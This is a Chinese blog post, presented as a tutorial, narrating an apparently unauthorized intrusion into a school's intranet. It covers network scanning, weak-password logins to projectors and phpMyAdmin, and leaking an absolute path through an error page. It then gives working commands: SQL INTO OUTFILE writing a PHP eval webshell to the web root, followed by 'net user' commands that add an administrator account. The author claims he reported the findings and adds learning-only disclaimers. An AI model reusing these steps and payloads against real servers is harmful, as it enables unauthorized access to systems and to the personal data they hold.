本文转载自【微信公众号:手机电脑双黑客,ID:heikestudio】,经微信公众号授权转载,如需转载与原文作者联系
首先设备接入在学校内网,lan网络的掩码是255.255.252.0 我的ip为10.3.16.*
开启扫描器扫了一遍自己网段机器,由于周末发现存活的ip很少,果断扩大扫描网络,增加网络号区间。
一通扫描发现大量的存活的主机,对几个常用端口扫描,发现几个投影仪存活,存在80端口,小伙伴简单研究下,发现web控制界面弱口令,然后可以进行开关机,调节参数等权限。
还发现大量开启135,138,139,445,3389,80,8080等端口的主机,瞬间激动了,知道学校内网安全特差,没想到这么差,小伙伴立刻想到几个高危洞,比如永恒之蓝。
经过嗅探发现内网大多是win7,少量xp,2003,2008,少量开着22的集成设备,路由等设备。
甚至还发现了校园监控的海康录像机ip,简单试了web和ssh下并不存在弱口令。
找到学校内网的oa学籍系统,对主机进行探测,win08sever系统,开了3389,80(学籍系统),8080(某教师xx系统),并未对上述服务进行任何测试,嗅探下,发现此主机竟然还存在在wan上的学校官网(两年前在wan对学校探测过,大量使用cms,基本上一个教学单位和行政部门一个cms,少数弱口令,网站有安全狗)做到这步,只是搜集了主机信息,并未作任何进一步测试,这也让我想明白早年学校一件事。
早几年某天学校通知有一女生收到助学金为由的诈骗电话,家人上当造成经济损失。学校提前通报大量学生家长大量收到来自广西口音的,以“助学金激活先交钱”为借口的诈骗电话,并能完整报出学生姓名,身份证,住址,手机,班级,学号,家长姓名,手机等信息。
当时遭遇此事,我从我搞安全的嗅觉中就觉得一定是学生学籍信息被泄露了。一直以为学籍系统是独立在内网的,一定是从校内职工泄露的。这次更加肯定了学籍被脱裤的推测,推断:攻击者在公网成功入侵学校网站,提权获得主机权限,发现学籍系统脱裤,出售给东南亚地区电诈黑产集团,电诈利用,学生受骗。。。
回到正题,发现大量开着80端口 http服务主机,以及开启了3389,发现一个是经管的竞赛答题平台。扫描后,80 一个cms站,8080一个cms站,445,3389开启。
对网页进行了检查并不sql注入,后台进行弱口令试探,又失败。扫描了一下目录,发现有phpmyadmin数据库web管理后台。甚至于目录下还有数据库备份sql文件。
弱口令进入!想起来sql语句可以直接在目录生成文件,但是不知道网站真实路径,在网页上各种加参数,让其报错,但是只暴露相对路径,并没有爆出绝对路径。经过百度phpmyadmin漏洞,发现有几个文件可以爆出绝对路径,果断试探之后,拿到绝对路径。
https://url/phpmyadmin/themes/darkblue_orange/layout.inc.php
Fatal error: Call to a member function getImgPath() on a non-object in
D:AppServwwwphpMyAdminthemesdarkblue_orangelayout.inc.php on line 67
有了绝对路径,就可以sql命令生成文件了
命令如下(先创建表,里面插入一句话木马,然后查询输出到文件。)
Create TABLE a (cmd text NOT NULL);
Insert INTO a (cmd) VALUES('<?php eval($_POST[cxk]);?>');
select cmd from a into outfile 'C:Program FilesphpStudywwwmbsuning4x.php';
Drop TABLE IF EXISTS a;
权限真大,菜刀成功连接上,然后上传个大马再运行dos命令添加用户。
Net user cxk pass /add net loaclgroup administrators 用户名 /add
然后就有管理员权限了。
3389上去,就能搞事情了
至此并未做进一步测试,并及时汇报给学校相关领导!!!
文章用于测试,防止类似的情况发生,提醒我们要怎么安全维护,切勿用于非法用途,仅限于学习。
声明:本人分享该教程是希望大家,通过这个教程了解信息安全并提高警惕!本教程仅限于教学使用,不得用于其他用途触犯法律,本人一概不负责,请知悉!
免责声明:本文旨在传递更多市场信息,不构成任何投资建议和其他非法用途。文章仅代表作者观点,不代表手机电脑双黑客立场。以上文章之对于正确的用途,仅适用于学习
